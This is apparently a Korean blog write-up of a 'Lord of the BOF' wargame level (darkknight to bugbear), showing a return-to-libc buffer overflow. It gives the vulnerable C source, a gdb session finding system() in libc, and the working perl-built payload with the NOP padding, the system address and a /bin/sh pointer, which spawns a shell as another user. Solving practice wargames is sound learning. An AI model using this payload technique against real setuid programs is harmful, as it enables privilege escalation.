반응형

허헣

rtl풀리니까 기분좋네여. 좀 처음에 헤매긴 했는데 잘되서 기분좋습니다!

login: darkknight

Password:

Last login: Sun Mar 16 07:20:14 from 192.168.10.1

[darkknight@localhost darkknight]$ ls -al

total 44

drwx------    2 darkknig darkknig     4096 Mar 29  2010 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-r--r--    1 darkknig darkknig       24 Mar  2  2010 .bash_logout

-rw-r--r--    1 darkknig darkknig      230 Mar  2  2010 .bash_profile

-rw-r--r--    1 darkknig darkknig      124 Mar  2  2010 .bashrc

-rwxr-xr-x    1 darkknig darkknig      333 Mar  2  2010 .emacs

-rw-r--r--    1 darkknig darkknig     3394 Mar  2  2010 .screenrc

-rwsr-sr-x    1 bugbear  bugbear     12043 Mar  8  2010 bugbear

-rw-r--r--    1 root     root          385 Mar 29  2010 bugbear.c

[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf') //이젠 아예 0xbf~주소를 못쓰게 됩니다.

        {

                printf("stack betrayed you!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$ cp bugbear bugbeer

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`



Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ gdb -q bugbeer core

Core was generated by `./bugbeer '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048436

(gdb) r

Starting program: /home/darkknight/bugbeer


Breakpoint 1, 0x8048436 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument

bash: nopx44,: command not found

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`

@AAAABBBB

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`

[darkknight@localhost darkknight]$ ./env ARG

ARG: 0xbffffc9d

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`

@AAAAü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`

@AAAAžü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped) //쵸콤 게싱....해써요..ㅋ

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ my-pass

euid = 513


와앙ㅇ와앎ㄴㅇㄹㅁㅇㄴㄹㅋㅋ

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

giant->assassin  (0) 2014.04.22
bugbear->giant(1)  (0) 2014.04.16
golem->darkknight  (0) 2014.04.06
skeleton->golem  (5) 2014.03.17
vampire->skeleton  (2) 2014.02.25

+ Recent posts